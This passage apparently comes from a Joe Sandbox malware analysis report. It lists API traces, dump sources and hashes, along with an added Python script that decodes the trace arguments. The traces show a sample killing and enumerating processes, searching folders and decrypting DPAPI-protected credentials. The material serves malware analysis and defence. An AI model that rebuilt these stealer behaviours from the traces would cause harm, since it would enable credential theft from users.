                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                      • Instruction ID: 0ab9fea244ec4bee779cbfd7f8d3f6e165031601536dd32e1e8b216a63350e9a
                      • Opcode Fuzzy Hash: 4566c0c5630167fd432b44f1eb58d29fa0f20bf0445cd0f7b1f2eb23497f76dd
                      • Instruction Fuzzy Hash: 18112AB2904218ABCB14DFD9DE45BBEB7F8FB4CB11F10461AF645A2280E3395950C7B5
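                      The argument values in these "APIs" records are raw hex, so the intent of a call is easy to misread: OpenProcess(00001001) is PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION (paired with TerminateProcess above, the sample kills processes, not just inspects them), CreateToolhelp32Snapshot(00000002) is TH32CS_SNAPPROCESS, the 00000128 passed to Process32First/Next is sizeof(PROCESSENTRY32) for the ANSI structure, and the CreateFileA calls open with GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING. The following is an added example written for this report, not code from Joe Sandbox or from the sample: a small parser for these trace lines that expands the flag words from the documented Win32 values and tags the behaviours they imply. The sample lines are copied from the records above; the table of constants and the function names are the example's own.

```python
"""Decoder for the hex arguments in Joe Sandbox "APIs" trace lines.

Added example, not part of the report or the sample. Parses lines such as
"• OpenProcess.KERNEL32(00001001,00000000,?), ref: 001D95AB", expands the
arguments that are Win32 flag words or enums, and summarises what the call
pattern implies. Only a handful of APIs are tabled; unknown values are left hex.
"""
import re

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# (api, zero-based argument index) -> bit flag names (documented Win32 values)
FLAG_TABLES = {
    ("OpenProcess", 0): {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
                         0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                         0x0400: "PROCESS_QUERY_INFORMATION",
                         0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"},
    ("CreateToolhelp32Snapshot", 0): {0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
                                      0x8: "TH32CS_SNAPMODULE"},
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 2): {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"},
    ("CreateFileA", 5): {0x80: "FILE_ATTRIBUTE_NORMAL"},
    ("CryptStringToBinaryA", 2): {0x1: "CRYPT_STRING_BASE64"},
    ("LocalAlloc", 0): {0x40: "LMEM_ZEROINIT"},
}
# (api, argument index) -> exact-value meanings
ENUM_TABLES = {
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("Process32First", 1): {296: "sizeof(PROCESSENTRY32)"},  # ANSI PROCESSENTRY32 is 0x128 bytes
    ("Process32Next", 1): {296: "sizeof(PROCESSENTRY32)"},
}


def decode_flags(value: int, table: dict) -> str:
    """Expand a bit mask into names; anything not in the table stays hex."""
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if bit and value & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest or not names:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def decode_arg(api: str, index: int, raw: str):
    """Return a symbolic reading of one argument, or None if not tabled/not hex."""
    if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", raw):
        return None  # "?", string literals and negative values are left alone
    value = int(raw, 16)
    if (api, index) in ENUM_TABLES:
        return ENUM_TABLES[(api, index)].get(value, f"0x{value:X}")
    if (api, index) in FLAG_TABLES:
        return decode_flags(value, FLAG_TABLES[(api, index)])
    return None


def parse_trace(lines) -> list:
    """Parse trace lines into records; lines that are not API calls are skipped."""
    records = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        decoded = {i: d for i, a in enumerate(args) if (d := decode_arg(m.group("api"), i, a))}
        records.append({"api": m.group("api"), "module": m.group("module"),
                        "ref": m.group("ref"), "args": args, "decoded": decoded})
    return records


def summarize(records: list) -> list:
    """Tag the behaviours implied by the call pattern, as an analyst would."""
    apis = {r["api"] for r in records}
    findings = []
    if any(r["api"] == "OpenProcess" and "PROCESS_TERMINATE" in r["decoded"].get(0, "")
           for r in records) and "TerminateProcess" in apis:
        findings.append("kills processes (OpenProcess PROCESS_TERMINATE + TerminateProcess)")
    if "CreateToolhelp32Snapshot" in apis and apis & {"Process32First", "Process32Next"}:
        findings.append("enumerates running processes (Toolhelp32 snapshot)")
    if "CryptUnprotectData" in apis:
        findings.append("decrypts DPAPI blobs (browser master keys / saved credentials)")
    return findings


# Constructed input: lines copied from the report's API records above.
SAMPLE_TRACE = """\
• memset.MSVCRT ref: 001D94EB
  • Part of subcall function 001D8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
• OpenProcess.KERNEL32(00001001,00000000,?), ref: 001D95AB
• TerminateProcess.KERNEL32(00000000,00000000), ref: 001D95C9
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001E05B7), ref: 001D86CA
• Process32First.KERNEL32(?,00000128), ref: 001D86DE
  • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
  • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
  • Part of subcall function 001C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
""".splitlines()

if __name__ == "__main__":
    recs = parse_trace(SAMPLE_TRACE)
    for r in recs:
        if r["decoded"]:
            print(f"{r['api']} @ {r['ref']}: {r['decoded']}")
    for f in summarize(recs):
        print("-", f)
```

                      The tables cover only the calls that matter for reading this report; extending FLAG_TABLES and ENUM_TABLES is the whole job of adapting it to another sample.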
                      APIs
                      • CreateFileA.KERNEL32(001D3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,001D3AEE,?), ref: 001D92FC
                      • GetFileSizeEx.KERNEL32(000000FF,001D3AEE), ref: 001D9319
                      • CloseHandle.KERNEL32(000000FF), ref: 001D9327
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID:
                      • API String ID: 1378416451-0
                      • Opcode ID: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                      • Instruction ID: d896ed4538183d2f3407ad12337edd67110cb4240434a819546fcd7ee07bf6dd
                      • Opcode Fuzzy Hash: 08099dfe31450bfc808f2c685bd8dddc39a2068358873499e6dc50610fa1198e
                      • Instruction Fuzzy Hash: BEF03779E40308BBDB14DBB0DD49B9E77B9BB48720F11C664BA51A72C0D670AA118B45
                      APIs
                      • __getptd.LIBCMT ref: 001DC74E
                        • Part of subcall function 001DBF9F: __amsg_exit.LIBCMT ref: 001DBFAF
                      • __getptd.LIBCMT ref: 001DC765
                      • __amsg_exit.LIBCMT ref: 001DC773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 001DC797
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                      • String ID:
                      • API String ID: 300741435-0
                      • Opcode ID: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                      • Instruction ID: 4dc162f7a3ba3a4bd18b9887dda62db0abd55765581348c6399eda4a01361676
                      • Opcode Fuzzy Hash: cb479c9beb2b014b2f6e3025a8327a9fe5012b88cbff9b799719ce3706f15b1f
                      • Instruction Fuzzy Hash: 41F0B432D09702DBDB21BBB8988774F33A06F10721F22494BF406AB3D2DB645941DED6
                      APIs
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4F7A
                      • lstrcat.KERNEL32(?,001E1070), ref: 001D4F97
                      • lstrcat.KERNEL32(?,00E39180), ref: 001D4FAB
                      • lstrcat.KERNEL32(?,001E1074), ref: 001D4FBD
                        • Part of subcall function 001D4910: wsprintfA.USER32 ref: 001D492C
                        • Part of subcall function 001D4910: FindFirstFileA.KERNEL32(?,?), ref: 001D4943
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FDC), ref: 001D4971
                        • Part of subcall function 001D4910: StrCmpCA.SHLWAPI(?,001E0FE0), ref: 001D4987
                        • Part of subcall function 001D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001D4B7D
                        • Part of subcall function 001D4910: FindClose.KERNEL32(000000FF), ref: 001D4B92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                      • String ID:
                      • API String ID: 2667927680-0
                      • Opcode ID: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                      • Instruction ID: 1fdca972dad2863ce0813c80bd8ba4c9b7a84d70b17c8001a18f272f1f79a641
                      • Opcode Fuzzy Hash: 8e9c3a7ca87b95d7847e12d0ab6f5baea4106d73cfe3b36bd922bee3b51cfd47
                      • Instruction Fuzzy Hash: 6B21987690030867C754FBB0DD56EED333CABA9300F004569B699A3181EF74DAD98B96